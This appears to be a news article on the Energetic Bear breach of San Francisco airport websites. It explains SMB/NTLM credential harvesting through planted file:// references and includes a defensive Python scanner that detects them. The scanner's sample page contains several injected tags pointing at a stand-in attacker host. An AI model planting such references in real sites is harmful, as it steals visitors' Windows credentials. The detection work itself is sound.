Earlier this week we reported that San Francisco International Airport’s websites had been hacked, a breach the airport authorities themselves disclosed. They said that many users’ account details had been compromised, but that there was no evidence of any further compromise resulting from the hack. At the time the airport did not say how the hack was carried out, but it did say that users whose accounts were found to be affected had been contacted and told how to protect themselves. Now it is time to reveal who was behind this airport security breach.
A new report published this morning attributes the compromise of two of the airport’s websites to Energetic Bear, a hacking group believed to be working for the Russian government. ESET, whose researchers traced the source of the attacks, said: “The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix.” In practice that means a reference to a file:// URL (or UNC path) on an attacker-controlled server was planted in the pages; when a Windows browser that honours such references resolves it, Windows may try to open the path over SMB and authenticate to the attacker’s server with the visitor’s username and an NTLM challenge-response. Chrome and Firefox refuse to load file:// resources from web pages, so the technique mainly catches users of Internet Explorer and other browsers that do not.
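What such a planted reference looks like, and how a site owner or incident responder can hunt for it in their own pages, as an added example that is not ESET’s code or anything taken from the airport’s sites. The sample page, the host 203.0.113.5 and the share names are constructed for illustration; the scanner flags any file:// URL or UNC path that names a remote host, while a file:/// path with no host refers to the visitor’s own machine and is ignored.

```python
# Added example (not ESET's or the airport's code): find file:// and UNC
# references in HTML that point at a remote host. Sample page is constructed.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes a browser resolves as a resource location; "style" is scanned for url(...)
URL_ATTRS = {"src", "href", "data", "action", "poster", "background", "style"}
FILE_URL_RE = re.compile(r"file://[^\s\"'()<>]+", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\[A-Za-z0-9.\-]+\\[^\s\"'<>]*")


def remote_host(ref):
    """Host named by a file:// URL or UNC path, or None for local paths and other schemes."""
    ref = ref.strip()
    if ref.lower().startswith("file:"):
        return urlparse(ref).netloc.lower() or None   # file:///C:/... has no host
    if ref.startswith("\\\\"):
        return ref[2:].split("\\", 1)[0].lower() or None
    return None


def refs_in_text(text):
    """Every file:// URL or UNC path embedded in free text (CSS, script, style attributes)."""
    return FILE_URL_RE.findall(text) + UNC_RE.findall(text)


class FileRefFinder(HTMLParser):
    """Collect (tag, attribute, reference, host) for each reference that names a remote host."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self._tag = None

    def handle_starttag(self, tag, attrs):
        self._tag = tag
        for name, value in attrs:
            if name not in URL_ATTRS or not value:
                continue
            candidates = refs_in_text(value) if name == "style" else [value]
            for ref in candidates:
                host = remote_host(ref)
                if host:
                    self.hits.append((tag, name, ref, host))

    def handle_data(self, data):
        if self._tag in ("style", "script"):       # raw CSS / JS text
            for ref in refs_in_text(data):
                host = remote_host(ref)
                if host:
                    self.hits.append((self._tag, "text", ref, host))

    def handle_endtag(self, tag):
        self._tag = None


def find_remote_file_refs(html):
    parser = FileRefFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed sample page: two legitimate references, one harmless local file:///
# path, and three references to a hypothetical attacker host 203.0.113.5.
SAMPLE_PAGE = r"""<html><head>
<link rel="stylesheet" href="https://www.example.org/site.css">
<style>body{background:url(file://203.0.113.5/share/bg.png)}</style>
</head><body>
<img src="https://www.example.org/logo.png">
<img src="file:///C:/Windows/Web/Wallpaper/img0.jpg">
<img src="file://203.0.113.5/share/1x1.gif" width="1" height="1">
<a href="\\203.0.113.5\share\report.pdf">report</a>
</body></html>"""

if __name__ == "__main__":
    for tag, attr, ref, host in find_remote_file_refs(SAMPLE_PAGE):
        print(f"<{tag} {attr}> -> {ref}  (SMB target: {host})")
```

Run it against a crawl of your own site’s rendered HTML; any hit whose host is not one of your own servers is worth treating as an injection until proven otherwise.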
ZDNet explains why that matters: “NTLM hashes can be cracked to obtain a cleartext version of a user’s Windows password. If the hackers had access to the airport’s internal network, they could have used credentials obtained from airport employees to spread laterally through the airport’s internal network to conduct reconnaissance, data theft, or sabotage.” Two points are worth adding. What the rogue server actually receives is not the NT hash itself but a NetNTLM challenge-response (NTLMv2 on a default modern Windows configuration); unlike a raw hash it cannot be replayed later in a pass-the-hash attack, but it can be cracked offline by guessing passwords, so weak or reused passwords fall quickly. And the standard defence for visitors is to block outbound SMB (TCP port 445) at the network edge, so that workstations cannot authenticate to Internet hosts at all.
ESET says that “This technique has been used for years by Energetic Bear/DragonFly,” and adds: “We don’t have any information about the compromise of another airport website.” It also notes: “According to ESET telemetry, the other websites that were recently compromised are mainly media websites in Eastern Europe.” That suggests the group’s campaign extends well beyond the airport, even though the other victims have not yet been named.